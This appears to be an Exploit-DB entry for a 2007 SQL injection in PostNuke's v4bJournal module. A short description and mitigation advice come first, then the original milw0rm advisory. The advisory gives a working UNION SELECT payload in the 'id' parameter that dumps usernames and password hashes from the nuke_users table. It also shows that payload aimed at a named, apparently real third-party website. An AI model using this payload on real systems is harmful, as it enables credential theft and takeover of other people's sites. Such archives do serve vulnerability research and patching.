PostNuke Journal

vendor:

PostNuke Journal

by:

Ali Abbasi

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PostNuke Journal

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

The vulnerability allows an attacker to perform SQL injection by manipulating the 'id' parameter in the 'index.php?module=v4bJournal&func=journal_comment' URL. By using a specially crafted payload, an attacker can retrieve sensitive information from the 'nuke_users' table.

Mitigation:

The vendor should sanitize and validate user input to prevent SQL injection attacks. Additionally, prepared statements or parameterized queries should be used to mitigate the risk of SQL injection.

Source

Exploit-DB raw data:

----------------------------------------
PostNuke Journal
----------------------------------------
                                   
                    DISCOVERED BY :Ali Abbasi
Olom Fonon Mazandaran University - Security Research Center, Babol, Iran
       
   Greetz For All Y! UnderGround Group Members ( www.2600.ir )

    Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )

         Contact:     abbasi@ustmb.ac.ir


                                   {SQL BUG}



in 
    index.php?module=v4bJournal&func=journal_comment&id=(SQL)




------------------------------------------

         EXPLIOT BY :ABDUCTER

Greetz For ABDUCTER Real Friend Nanos (Nancy)

Contact:   ABDUCTER_MINDS@YAHOO.COM 
 


   index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*

EX:- 
http://www.arsfoodcourt.com/index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*


U must regrister first ( You Most Register First )
-------------------------------------------

# milw0rm.com [2007-05-02]